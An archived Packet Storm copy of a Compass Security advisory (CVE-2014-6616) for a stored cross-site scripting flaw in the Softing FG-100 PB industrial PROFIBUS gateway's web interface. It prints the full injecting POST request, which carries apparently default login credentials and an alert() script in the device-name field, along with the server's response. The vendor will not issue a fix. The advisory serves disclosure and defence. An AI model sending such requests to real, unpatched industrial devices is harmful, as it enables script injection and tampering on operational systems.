Exploit the possiblities

Softing FG-100 PB Cross Site Scripting

Softing FG-100 PB Cross Site Scripting
Posted Nov 5, 2014
Authored by Daniel Marzin, Johannes Klick, Ingmar Rosenhagen

Softing FG-100 PB suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-6616
MD5 | 6de7c827c470f829f7b16bc5024e944d

Softing FG-100 PB Cross Site Scripting

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Softing FG-100 PB
# Vendor: Softing AG (www.softing.com)
# CVD ID: CVE-2014-6616
# Subject: XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Johannes Klick
# Daniel Marzin
# Ingmar Rosenhagen
# Date: 05.11.2014
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. This
device is used in industrial setups for making Profibus device available
via ethernet. Compass Security Deuschland GmbH [2] discovered a security
flaw in the webgui of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web gui does not properly encode output of user data in at least one
place. Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O
RG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name
</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>
</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3
</td><td> </td></tr><tr><td><strong> Subnet Mask
</strong></td><td> 255.255.255.0 </td><td>
</td></tr><tr><td><strong> Default Gateway </strong></td><td>
</td><td> </td></tr><tr><td><strong> Maintenance IP Address
</strong></td><td> 192.168.212.231 </td><td>
</td></tr><tr><td><strong> New network parameters will be used
</strong></td><td> immediately
</td><td></td></tr></table><br></body></html>



Workaround / Fix:
-----------------
no patch is available

Timeline:
---------
Vendor Notified: 2014-09-15
Vendor Response: 2014-10-24
Vendor Status: Wont fix

References:
-----------
[1]:
http://industrial.softing.com/de/produkte/profibus-master-or-slave-configura
ble-single-channel-remote-interface.html
[2]: http://www.csnc.de


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close